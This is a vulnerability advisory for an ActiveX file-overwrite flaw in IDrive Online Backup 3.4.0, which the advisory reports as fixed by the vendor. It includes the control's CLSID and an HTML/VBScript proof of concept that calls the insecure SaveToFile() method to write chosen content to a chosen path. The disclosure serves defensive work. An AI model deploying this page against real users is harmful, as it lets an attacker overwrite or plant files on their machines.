Vulnerability ID: HTB23025 Reference: http://www.htbridge.ch/advisory/idrive_online_backup_activex_control_insecure_method.html Product: IDrive Online Backup Vendor: Pro Softnet Corporation ( http://www.idrive.com ) Vulnerable Version: 3.4.0 and probably prior Tested on: 3.4.0 Vendor Notification: 15 June 2011 Vulnerability Type: ActiveX Control Insecure Method Status: Fixed by Vendor Risk level: High Credit: High-Tech Bridge SA Security Research Lab ( http://www.htbridge.ch/advisory/ )
Vulnerability Details: High-Tech Bridge SA Security Research Lab has discovered a vulnerability in IDrive Online Backup ActiveX control, which can be exploited to overwrite arbitrary files. The vulnerability is caused due to the UniBasicPack.UniTextBox (UniBasic100_EDA1811C.ocx) ActiveX control including the insecure "SaveToFile()" method. This can be exploited to rewrite arbitrary files in the context of the currently logged-on user. The following PoC code is available: <html> <object classid='clsid:979AE8AA-C206-40EC-ACA7-EC6B6BD7BE5E' id='target' /></object> <input language=VBScript onclick=Boom() type=button value="Exploit"> <script language = 'vbscript'> Sub Boom() arg1="FilePath\File_name_to_rewrite_or_create" arg2=1 arg3="New_File_Content" target.Text=arg3 target.SelStart=0 target.SelEnd=Len(arg3) target.SaveToFIle arg1,arg2 End Sub </script> </html> Solution: Upgrade to the most recent version
